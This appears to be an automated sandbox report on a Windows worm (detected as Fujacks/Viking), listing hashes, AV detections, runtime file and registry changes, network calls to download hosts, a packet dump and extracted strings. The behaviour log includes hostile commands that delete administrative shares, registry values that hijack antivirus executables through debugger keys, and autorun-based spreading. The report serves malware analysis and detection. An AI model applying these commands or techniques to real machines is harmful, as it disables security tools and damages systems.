Analysis Date2014-01-29 19:04:37
MD599bf68181499ae728e6c836ecb02dd84
SHA1687dfa8d7d79f5df5963f6ebc9aea055b020e598

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 474055486b8ce85dec1852c5f17a26a8 sha1: ba9dd84a05b49d97a5ed34ac02571c9280946952 size: 69632
Section.rsrc md5: 91751504ebde2d0d0950c8a39795ea41 sha1: 3165bc0d551205f2c79e5aab922eba2984aff55e size: 6144
Section.Program md5: f8912b7ddef251874546a2db0df108bf sha1: d31d0b7626c7b251c1881ded55c1ac6b2ce71868 size: 1792
Timestamp1992-06-19 22:22:17
PackerCDS SS 1.0 beta1 -> CyberDoom
PEhashb283454e674941accf9925498e1651409de4b7f8
AVmcafeeW32/Fujacks.aw
AVclamavTrojan.Killav-108
AVaviraTR/Crypt.ULPM.Gen
AVavgWin32/Ngvck.AO
AVmsseVirus:Win32/Viking.JB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system32\drivers\suchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\59$$.bat
Creates Filec:\qw.sys
Creates FileZLHIS+.exe.exe
Creates ProcessC:\WINDOWS\system32\drivers\suchost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\59$$.bat

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del61$$.bat

Process
↳ cmd.exe /c net share C$ /del /y

Creates Processnet share C$ /del /y

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Processnet share admin$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\59$$.bat

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat

Process
↳ cmd.exe /c net share E$ /del /y

Creates Processnet share E$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSwww.daohang08.com

Process
↳ C:\WINDOWS\system32\drivers\suchost.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_CLASSES_ROOT\HTTP\shell\open\command\ ➝
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ➝
128
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ➝
C:\WINDOWS\system32\drivers\suchost.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe\Debugger ➝
ntsd -d\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\myUPdatetxt.txt
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del61$$.bat
Creates File\Device\LanmanRedirector\192.168.1.1\IPC$
Creates File\\192.168.1.1\shared\Cool_GameSetup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\ENU\Desktop_.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\Desktop_.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\52$$.Ico
Creates FileC:\autorun.inf
Creates FileC:\autorun.inf
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates FileC:\Program Files\Adobe\Desktop_.ini
Creates FileC:\Program Files\Desktop_.ini
Creates FileC:\temp\run\Desktop_.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Desktop_.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\Desktop_.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\Desktop_.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\86$$.Ico
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates Filec:\qw.sys
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Desktop_.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Esl\Desktop_.ini
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\Desktop_.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\temp\Desktop_.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\72$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Desktop_.ini
Creates FileC:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\temp\logs\Desktop_.ini
Creates FileUNC\192.168.1.1\PIPE\srvsvc
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\86$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\72$$.Ico
Deletes Filec:\qw.sys
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\52$$.Ico
Creates Processcmd.exe /c net share C$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del61$$.bat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n
Creates Processcmd.exe /c net share E$ /del /y
Creates Processcmd.exe /c net share admin$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates ServiceRESSDT - c:\qw.sys
Winsock URL<html>\\n <head>\\n <title>404 Not Found</title>\\n </head>\\n <body>\\n <h1>Not Found</h1>\\n <p>Your browser sent a request that this server could not understand.</p>\\n <p>No such file or directory.</p>\\n <hr />\\n <address>Microsoft-IIS/7.0</address>\\n </body>\\n</html>\\n
Winsock URLhttp://www.xlsf013.cn/down.txt
Winsock URLhttp://www.9z9t.com/down1.txt

Process
↳ net share C$ /del /y

Creates Processnet1 share C$ /del /y

Process
↳ net share admin$ /del /y

Creates Processnet1 share admin$ /del /y

Process
↳ net share E$ /del /y

Creates Processnet1 share E$ /del /y

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates Process

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 856

Process
↳ Pid 1024

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1860

Process
↳ Pid 1128

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n

Process
↳ net1 share C$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share admin$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share E$ /del /y

Creates FilePIPE\srvsvc

Network Details:

DNS9z9t.com
Type: A
184.168.221.77
DNS22283.bodis.com
Type: A
199.59.243.107
DNS22283.bodis.com
Type: A
199.59.243.108
DNS22283.bodis.com
Type: A
199.59.243.109
DNS22283.bodis.com
Type: A
199.59.243.106
DNS22283.bodis.com
Type: A
199.59.243.105
DNSwww.9z9t.com
Type: A
DNSwww.xlsf013.cn
Type: A
DNS1.1.1.10.in-addr.arpa
Type: PTR
DNSwww.daohang08.com
Type: A
HTTP GEThttp://www.9z9t.com/down1.txt
User-Agent: ErrCode
HTTP GEThttp://www.daohang08.com/2.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 184.168.221.77:80
Flows TCP192.168.1.1:1045 ➝ 199.59.243.107:80

Raw Pcap
0x00000000 (00000)   47455420 2f646f77 6e312e74 78742048   GET /down1.txt H
0x00000010 (00016)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000020 (00032)   656e743a 20457272 436f6465 0d0a486f   ent: ErrCode..Ho
0x00000030 (00048)   73743a20 7777772e 397a3974 2e636f6d   st: www.9z9t.com
0x00000040 (00064)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000050 (00080)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f322e68 746d2048 5454502f   GET /2.htm HTTP/
0x00000010 (00016)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000020 (00032)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000030 (00048)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e64616f   )..Host: www.dao
0x000000c0 (00192)   68616e67 30382e63 6f6d0d0a 436f6e6e   hang08.com..Conn
0x000000d0 (00208)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000e0 (00224)   76650d0a 0d0a703e 596f7572 2062726f   ve....p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings

DVCLAL
MAINICON
PACKAGEINFO
/Var
}&^~")
0bVQbO
<0[ee2-x'(
.<0Oqw
0@P\hM
0r=<9w9i
 0@TdL
0v).w v
%0&$;.XJ4UF5;30,
*0yk`p$
1 Cly/
#1@%ddR
	)1Lfe
1V;S1V
2:7%|&
2B)13&73.
=2BohW
#(2dk>
$2#G:0YF1QJ2T
2gZi~v
@2N|kr`462(gi.;-
2tpl	 2
}2U`o7Y
30{'v @
32Snapsh
3'+}3%
3kavsvc
3,Kj3#{
{3sd3w
3) VQ^
>+$42	)/
~!43Tc
4\dlt|
4E(pDe$H
4M,4<DLT4M
4M(<\j
/[*4[N
\4T2\(W
\$4VS}V
4YW[SO
5)+3))3)*5)
(56)(>))=))=))7))8)%9'$
56Sgolf
!5gmQ}
_)5O*zK'jK'kK&hI1zU
5QT=C>*
5wKK)(_;
6$6*60666<6B6H6
6bBZ$|
^6e>ku
" 6!P5
&{7)%?!
 =72l\^
7.,KI)K
7NY8iPt
/7sInverflow
851968
_8h6e_
8h6eAQ
8h6e>f:y6e9
8HXhxM
 8~&%K=
8K;'#n
8^(uag
8"," x -
>8|ziq[inm!
>9#3I8
\9`<j]
9(\J5K:/K
9*m<.mhQ
="~a?|
A{Advyi
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32
advapi32.dll
aHh|g%
aKTUaW
_allmul
API-Log v1.2 by M.o.D. [F2F]
aSyb!k
^.A.T1
AutoRu
AxXtOV
?b^\'`
B((	)&
	#B0y;
[&&b'4c+3S
> Bad	=cB
~bAj;_
bckp- f0
,behigj`1>
BIG5KGREEK
BI:H@ ?
BitBlt
bJTUSSbpS
BlnSelect
BMW!!ZLHIS+.exe.exe
BNH]D&C
bO&qKHqLDiI?
'B'P '
bPIXV5B,
BtnF*C
bUSMOI
Bvcedc
>c0X6";
CallNextHookEx
C*CDocum
cCg'`(
.%CC.NF5XL5Q
cCsEi}/!Mml
CCSM;+GBmm
CCurrenc
Cd(x(r
chsiaAqu
|ci600
_CIatan
c);IceSw
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
clBlack
CloseHandle
 /c M.)
cMcshield.exe
cnq/ii
CoInitialize
comctl32.dll
Cool Debugger for Win32
<Copy*o{3
|	,<Cp
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateFileA
CreateToolh
CreateToolhelp32Snapshot
c/-Rf;0 
c:\r}.t
C_ "RV L7ES
	cUSnc
C:\WINDOWS\system32\MSCOMCTL.oca
C~.;Y{C
'D&4f84FH,
)D)"9DrX)
`.data
DDbisbu417suf~
DDDDDDDDDDDDDD@
DDDDDDDDDDOD@
DDDOD@
D%.*dT}i
~Debugl
+Defaul
DEFAULTe
DHB\HB
DHFFFFLPTXFFFF\`dhFFFFlptx
dh{*s#yY
,}DIB"s
DiskFreeSp
dJ44KF
DllFunctionCall
DlRAMo	-
dProcessMe
DqUs)M
DsJjTsu
_DV4P^D
#e%7[J)TO
.E7MI>
E<BpMY
ECWGTN24*CMJQ
edImage
EDivByZ
// EE5
e>f:y!j
e>f:y{v
e>f:y'Y
EIn]Err[
eJ0sL3
/ej(eisi/r|s' 
EM3_.5f,4^
EnumWindows
EOutOf
eptionp[gp
_E]Q7RlTmxYw
eQ(u7b
- ERROR! -
eUSnc{|
eUSnc/f&TSbpS
eUSncSbpS<h
E)|V6F?
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
ExitProcess
ExtractIconA
e>YqmkbkruX`~t
f0P	DP
F;3vQQ
F4|8'c
F8Phdo@
f9w4u/
FcmP&M
F_d3moo
Fdd;u&
FindWindowA
(FiwuC@Yz0
)(fMoM
foB.{	+4
FPUMaskValue
Frame1
fRcQ7Y]<jsT
|FreBoth@m
FrmAccoutChoose
FrmChangePass
FrmMainObj
frmSplash
frmUserLogin
/f&T	c
/f&T>f:y
/f&T>f:y\P(uo
FTJIS_
>f:y6e9
>f:yaSGr
>f:y@b	g
>f:y@b	g1Y
>f:y@b	g6e>kXT
>f:yeQOO
>f:y"k
>f:y\P(u
>f:y\P(uUSMO
>f:y\P(uy
>f:ySO
>f:yUSnc
>f:yUSnc4Y
>f:y(Wb
>f:y'Y
G@49@.;U0ID7'K
[G.a<',,%
GANSI_
GBIOS1
GCpsBz
gdi32.dll
GetComputerNameA
GetCurrentProcessId
GetLongPathNameA
GetParent
GetProcAddress
GetWindow
GetWindowLongA
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
gGkup{
gG 	=`T|m
GIF89aT
$g!/L$
[Gl;`>f:yGl;`
`gms,f
GMulDivId
GN\_IZMTEakzg{gn|T_aflg
gQ9gP7bU>lL
 Grr|xxr
gT;~~d
g'Y{vU_pe)
H@2HS7RR7HR8JR;SU?
H4op!T
%H"4Z90P@/XF3WI3WG3XI4GE'L
h5)u~p
Hacked Spy
	H!'c\
hCR:,U
hDxXxM
HE	Hd(N8(
H+&GO0~O3
hHr,g,
homt8/
[,?HotL
H;= pY
hUSnc{|
^hync{|
^hyncyb!k
hyncyb!k
*I0;pN
I1t9+h0
I4sAdap8b
"I75B	 O8(@9(<4
i)"dcK_QGZ%
if exvo
I&(<Hy
iI%oJ(m
IKK8TT6JJ5KK
Image1
ImageList
imgFlag
ImgIndicate
imgPic
INFNANDm7
InitCommonControls
InternetOpenA
IO6P^2
iOi_?CG
i%!qmc
IsDebuggerPresent
IsWindowVisible
(/itD$
	IU0M]
|I'VS'E
iw{rns
	I $y0
}#j4h4e@
J>8RHVDq
jbugtn
%JD0*0$
}#jDh4e@
}#jDhtn@
jd&wub;&
}#j<h@b@
}#j@h@b@
j@h@b@
}#jHh4e@
jHh4e@
}#j<htn@
}#j|htn@
}#jLh4e@
jl[noba
JO8|"G
}#jPh@b@
}#jPhTa@
jPhTa@
jU'm''s
}&jXhTa@
}#jXhTa@
jXhTa@
JXv>Full=
K0jO2o
]:kb;{
kernel32
kernel32.dll
KERNEL32.DLL
Ke#!UM
kgzjo"%
k/P7l?p
KSky^;
kTs^bRs
K	U/G)
*.*KWINDG
~KxI[)
K.yL,TK.
K}zzmf|^mz{agfTAe
],L7|;\
Label1
Label2
Label3
+lB)jP'`M'2 $
lblGrant
LblNote
LblProductName
lblWarning
lh32 GhLd#9
LimegYellowG
ListFir
ListView
L`_[|}j
ljPg`M`?M`@
L`LHgd@
*lM@p>=gD>gD<`5,
LoadLibraryA
lO/"f}
lO&lbh
 LQ~NW
lQqQhQ@\
lQqQ!jWW\
lstrcmpA
lsuv>(.qsp/?~>u()`hv
LTeS.TO)SUPb5H 'L
l@thTm
lusteWl
LvwSelect
^$L#?w
l^XU[c
[lybd_e
ly]i3;
MBia Play>
mblnChangePass
m||ddzl
mdlMain
mdlParameter
\&m\*DWJ
MeO^$4s
MessageBoxA
mgx<H 
_M#m($p
Module
#mP(mK'
(Mpmk}|
mpr.dll
MSComctlLib
MSComctlLib.ImageList
MSComctlLib.ListView
MSCOMCTL.OCX
MSVBVM60.DLL
.m-\t!
`mT4k[,q]<nO:W
MteH_&{
mW9iU9hT<s@<3S0
mY'i	%z
negFZm
NETAPI32.DLL
NetRemoteTOD
nfnp:188(h`vflc:S
N/f&Tck8^
-N/f&TX[(W
N>f:y 
N>f:yD
NGEUH-
;N:gW[&{2N	
NhVpenc
Nhyncyb!k
	N!k{vU_1Y%
N=#LN;LT:F
N[[[[[N
NN<NNNN
NNN[NNN
NN<NNNNNNNNNNNN
NNNNNNNNNNNNNNNNN
not beT@
@Np*|*(
NSbpS	
NTDETECT.COM5
\\.\NTICE
nvO`]\NV
O44#72
OB=	hQ
od/nOr
O/f&T/T
oftware
]OJNSMa)E4KF8)B2
*oK(H;
[O<KN<
ole32.dll
oleaut
oleaut32.dll
OLLYDBG
.om,	;
omnView
{oNbarp
OpenProcess
OPEWOEM.
o_RUST
$oS(fI'nL'}R)
otAddSubw
@	otjlCk@x
]\OUSMO
_Outloor&kO
OXTaSyb!k
Pb7eN5BI:
~pb/"=B
\PbkMO
pencMO
?pEYXI=
pg1tiM]
pKh#h+
 plu]JU|
PL?Y~7
prjMain
Process32First
Process32Next
.Program
PsD~Ss
?Purple#TenO
PX<]C0_
Q	akm;
Qcales
qcvKDesktop_.iniY
qQ(u1\
qQ(u6e9
)qr/G3
Qs|5DsO
Qs6nTs
QsD;Ts
Qs{eRs
Qs.kTsL
Qso_Rs
QsrkSs+lSs
QsSuTsQhRsV
| q#v{
$Q/yy?
Range@V /
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
Relogin
Repa8 E
rfacep
R/f&T/T
RichSM
R"iZ1q
rland\Delphi\RTL
RLzTmp!<
RsA^Rs
RSbpS3u
Rsb>Rs
RsC`Ts
rsdMsB
Rs__Rs
<Rs[rSs=
"RTL+C
RXDk|g
r^yC/IH0KF,BB.GE(F
ryL]fC
R+,zKM
+!``[s
'}%`;S1V
;S1VP[
s9QX@Q
Safecal
SbpS:g
SbpShTpe
s)ciLs j
sC$kK'jJ'jJ'iK#o8?
SearchX
SetActiveWindow
SetROP2
SetWindowLongA
SetWindowPos
SF2PC1ID2VC2:=0
S>f:y	gpenc
shell32.dll
SHOHLL6
Show_me
ShowWindow
Sh.P>S
Shyncyb!k
\\.\SICE
sIiU_]
\\.\SIWVID
S_MR6e9
	SOFTWARE\Bo
SO)nUS
SO)nUSSbpS	
SO)nUSSbpS:g
SQf3Pd
SqQ(u6e9
S+T\P(u
S+T\P(uirD
String
StrInputPass
 SU<HtH
S(W8h6e{v
S_)YeQb
SYMBOL1
System
t2 Grpp
t3Peep
T	.47*
tagEXCEPqO
tc`Mc]jXf
TColor
{T'ct#
TerminateProcess
te;S1V
tgdqmsS^
The Customiser
The Customiser Configuration Screen
!This program cannot be run in DOS mode.
This program must be run under Win32
{TI^X&m
t/[koo
t=KV(g)3
TLT9 GrPP
>$TMul
TObjectt3
toskrnl
tpeW[~{
(Tps z
TrainerSpy XP + NT / 2000 / XP + Coded By BofeN
\\.\TRASPY.VXD
	T*Rec
Trtrtw
TRW2000 for Windows 9x
TsjWSshrRs
?t=.)spv(=}8r*dnk+
TsqbRs@
TsreSftl
Ts:_Rs
/T(u	N
TURKISH{
+t_$xtZXt
=%|=.u
u#	Fue
uHlg``Uu
uH&sD$rD#yB$|]K
Ujdqi@
uKJlZ<
U,|llI!{
u!%mCto
UnknowDeci
uP1Kill_Uni
up\G9a
uQ*kJ'kJ'iJ%qQ8
URLDownloadToFileA
URLMON.DLL
user32
user32.dll
u:S>f:y
US!k>f:y
USMO5u
USnc{|
USnc<h
UYs,!sCE
)V@2U<1U?0TC2T:2VE3R
vap!Xw	
VariantCopy
VB5!6&vb6chs.dll
VBA6.DLL
__vbaAryDestruct
__vbaAryUnlock
VBaA{Y
__vbaBoolVarNull
__vbaCastObj
__vbaCastObjVar
__vbaChkstk
__vbaDateStr
__vbaDateVar
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitProc
__vbaFileOpen
__vbaForEachCollObj
__vbaForEachCollVar
__vbaFpCy
__vbaFPException
__vbaFpI4
__vbaFpR8
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarg
__vbaFreeVarList
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInputFile
__vbaInStr
__vbaInStrVar
__vbaLateIdCall
__vbaLateIdCallLd
__vbaLateIdSt
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLenBstr
__vbaLenVar
__vbaLenVarB
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaNextEachCollObj
__vbaNextEachCollVar
__vbaObjIs
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaR4Var
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRefVarAry
__vbaResume
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrCy
__vbaStrDate
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrLike
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaVarAdd
__vbaVarAnd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCmpGt
__vbaVarCmpNe
__vbaVarCopy
__vbaVarDup
__vbaVarIndexLoad
__vbaVarIndexLoadRefLock
__vbaVarLateMemCallLd
__vbaVarLikeVar
__vbaVarMove
__vbaVarOr
__vbaVarSub
__vbaVarTstEq
__vbaVarTstNe
__vbaVarZero
VirusScanNOD32
v\~ME/
$Vol& O
VsTskMgrnaPrd
vwxxyy
vwxyzz
VxDMonClass
wa	e;$
w;%D<D
wGB2312
wininet.dll
wN\7OK
WNetAddConnection2A
WriteProcessMemory
-<~WSA
wsock32.dll
Wt4xPmn
w#t?Htb
wUgLXB
W,	W5TR?g.#=
wYuX[o
X2UI5PE4PE4ME>nF<EH<
xaS;Tu
xBrfht"
XDsB>]`
X[>e(WO
 xGra;c
^X[irD
xm`wl_yna
XorCmp4FromSt
X< qN(kJ'iK%p*1
`\XTag
X'Zhk/5;;m
!'y)05
Ya5yhNtpNshQub@~[C
y	ghQ@\\
y	g!jWW\
YHr,g>
YHr,g 
YHr,g,
~y~>LD
ympmpk
Y{vU_(
yX`?iE
~~~}}}{{{yyywwwuuurrrqqqooollljjjhhhgggdddbbb___]]][[[YYYVVVUUUSSSPPPOOOLLLKKKHHHFFFDDDBBB@@@<<<:::888///---+++)))%%%!!!
')Z>2RF1SE1UJ2L	(J
)Z8.`^
Z}*"+8A
z[D3.$
 Z.eO\d
)zineQmsctls_
ZLHIS+
ZTUWVSA
<zwpo}
`ZzpM(
zz}vb_